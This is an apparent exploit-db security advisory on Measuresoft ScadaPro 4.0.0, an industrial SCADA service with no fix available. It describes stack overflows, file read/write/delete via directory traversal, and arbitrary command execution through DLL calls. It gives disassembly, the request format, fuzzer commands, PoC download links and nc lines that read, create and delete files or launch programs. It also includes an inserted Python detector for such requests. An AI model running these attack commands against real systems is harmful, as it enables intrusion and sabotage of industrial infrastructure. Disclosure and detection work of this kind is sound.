Measuresoft ScadaPro 4.0.0 – Multiple Vulnerabilities

  • Author: Luigi Auriemma
    Date: 2011-09-14
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/17844/
    
    #######################################################################
    
     Luigi Auriemma
    
    Application:Measuresoft ScadaPro
    http://www.measuresoft.com/products/scada-products.aspx
    Versions: <= 4.0.0
    Platforms:Windows
    Bugs: arbitrary commands execution
    directory traversal in read, write and delete mode
    tons of stack overflow vulnerabilities
    various Denial of Service vulnerabilities
    Exploitation: remote
    Date: 13 Sep 2011
    Author: Luigi Auriemma
    e-mail: aluigi@autistici.org
    web:aluigi.org
    
    
    #######################################################################
    
    
    1) Introduction
    2) Bugs
    3) The Code
    4) Fix
    
    
    #######################################################################
    
    ===============
    1) Introduction
    ===============
    
    
    From vendor's website:
    "ScadaPro is Real Time Data Acquisition software for Microsoft Windows.
    Optimised to use the powerful real time, multi-tasking features of
    Windows, ScadaPro provides integrated data acquisition, monitoring,
    data logging, mimic development and report generation."
    
    
    #######################################################################
    
    =======
    2) Bugs
    =======
    
    
    service.exe is a service listening on port 11234.
    
    Initially I started to test this software as usual by checking all the
    operations performed by the various opcodes, which are divided into
    groups identified by the second byte of the packet, while the first
    byte is the opcode for the final operation.
    The function that handles the various groups and opcodes is located
    at offset 004061F0.
    
    The problem is that there are so many security vulnerabilities and
    design problems in this service that it is not worth continuing the
    tests, so after checking the opcodes of the 'F' group and a quick scan
    of the others I stopped any further test to avoid wasting more time.
    This means that there are surely other vulnerabilities, but the most
    important ones (stack overflows, code execution and file access) have
    been covered in the 'F' group, and the main stack overflows of all the
    groups can be caught with the simple scanner linked in the next
    section.
    
    In short, there are stack overflow vulnerabilities in almost all the
    supported commands; they come from sscanf calls and in-line strcpy
    copies like the following, taken from the "TF" command:
    
    0040A0D9  .  8D5424 38      LEA EDX,DWORD PTR SS:[ESP+38]
    0040A0DD  .  52             PUSH EDX
    0040A0DE  .  68 84D46700    PUSH service.0067D484        ; "%s"
    0040A0E3  .  57             PUSH EDI
    0040A0E4  .  E8 12F20000    CALL service.004192FB        ; sscanf
    ...
    0040A114  >  8D5424 20      LEA EDX,DWORD PTR SS:[ESP+20]
    0040A118  .  8BC7           MOV EAX,EDI
    0040A11A  .  2BD7           SUB EDX,EDI
    0040A11C  .  8D6424 00      LEA ESP,DWORD PTR SS:[ESP]
    0040A120  >  8A08           MOV CL,BYTE PTR DS:[EAX]
    0040A122  .  880C02         MOV BYTE PTR DS:[EDX+EAX],CL
    0040A125  .  83C0 01        ADD EAX,1
    0040A128  .  84C9           TEST CL,CL
    0040A12A  .^ 75 F4          JNZ SHORT service.0040A120
    
    Obviously there are many Denial of Service bugs too.
    
    Then there is full control over the files to read and write, and the
    possibility to use directory traversal attacks, as in the "RF" and
    "wF" commands (the first char is lowercase because there is a check
    that blocks its use); example of the tab-separated arguments:
    
    RF%
    filename
    ReadFile.nNumberOfBytesToRead
    SetFilePointer.lDistanceToMove
    SetFilePointer.dwMoveMethod
    CreateFile.dwDesiredAccess
    CreateFile.dwShareMode 
    ???
    CreateFile.dwCreationDisposition
    CreateFile.dwFlagsAndAttributes
    content if in write mode
    
    It's also possible to delete files and whole folders (including their
    files) via the "UF" and "NF" commands.
    
    Then it's possible to pass custom arguments to the backup commands, as
    happens with "BF", "OF" and "EF" while executing mszip, because the
    arguments are not sanitized against the injection of the '"' char.
    The program also supports other backup programs like tar and compress.
    
    And finally, through the "XF" command it's possible to execute an
    arbitrary function of a DLL, for example "system" from msvcrt.dll, to
    run any desired custom command.
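A defender-side check for the packet layout described above, added here as an example and not part of the advisory or of the vendor's code: it parses a request to service.exe (opcode byte, group byte, '%', tab-separated arguments) and flags the RF/wF traversal, UF/NF deletion, XF DLL call and BF/OF/EF quote-injection cases, plus any oversized argument as a possible stack overflow. The 256-byte threshold, the argument layout of commands other than "RF" and the sample packets are assumptions/constructed.

```python
import re

# Risky commands the advisory names: finding tag and a short description.
COMMAND_RISK = {
    "XF": ("dll_call", "calls an arbitrary exported DLL function"),
    "UF": ("delete", "deletes files or whole folders"),
    "NF": ("delete", "deletes files or whole folders"),
}
BACKUP_CMDS = {"BF", "OF", "EF"}   # arguments reach mszip/tar/compress unsanitised
FILE_CMDS = {"RF", "wF"}           # read/write with a caller-supplied filename
TRAVERSAL = re.compile(r"(^|[\\/])\.\.($|[\\/])")
ABSOLUTE = re.compile(r"^([A-Za-z]:)?[\\/]")
MAX_FIELD = 256  # assumption: threshold for "too long for a fixed stack buffer"


def parse_request(payload: bytes):
    """Split one request into (command, args), or None if it is not a command packet.

    Layout taken from the advisory: byte 0 is the opcode, byte 1 the group,
    then '%' and tab-separated arguments (filename first for RF/wF).
    """
    if len(payload) < 3 or payload[2:3] != b"%":
        return None
    cmd = payload[:2].decode("latin-1")
    args = payload[3:].decode("latin-1").split("\t")
    return cmd, args


def classify(payload: bytes):
    """Return a list of (tag, detail) findings for one request payload."""
    parsed = parse_request(payload)
    if parsed is None:
        return []
    cmd, args = parsed
    findings = []
    if cmd in COMMAND_RISK:
        tag, why = COMMAND_RISK[cmd]
        findings.append((tag, f"{cmd} {why}"))
    if cmd in FILE_CMDS and args:
        if TRAVERSAL.search(args[0]):
            findings.append(("traversal", f"{cmd} filename contains '..': {args[0]!r}"))
        elif ABSOLUTE.match(args[0]):
            findings.append(("absolute_path", f"{cmd} filename is absolute: {args[0]!r}"))
    if cmd in BACKUP_CMDS and any('"' in a for a in args):
        findings.append(("quote_injection", f"{cmd} argument contains a '\"' char"))
    if any(len(a) > MAX_FIELD for a in args):
        findings.append(("oversize", f"{cmd} argument longer than {MAX_FIELD} bytes"))
    return findings


if __name__ == "__main__":
    # Constructed sample requests, not captured traffic.
    for pkt in (b"RF%..\\..\\boot.ini\t16\t0\t0", b"BF%dir\" extra", b"TF%" + b"a" * 600):
        print(pkt[:16], classify(pkt))
```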
    
    
    #######################################################################
    
    ===========
    3) The Code
    ===========
    
    
    http://aluigi.org/testz/udpsz.zip
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15707.zip
    
    only a simple scanner:
    udpsz -d 2 -c "xx%" -b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000
    udpsz -d 2 -c "xx%test\t" -b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000
    udpsz -d 2 -c "xx%test," -b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000
    
    http://aluigi.org/poc/scadapro_1.zip
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17844-2.zip
    
    nc SERVER 11234 < scadapro_1b.dat ; read c:\boot.ini
    nc SERVER 11234 < scadapro_1c.dat ; create c:\evil_file.txt
    nc SERVER 11234 < scadapro_1d.dat ; delete c:\valid_file.txt
    nc SERVER 11234 < scadapro_1e.dat ; execute notepad
    
    
    #######################################################################
    
    ======
    4) Fix
    ======
    
    
    No fix.
    
    
    #######################################################################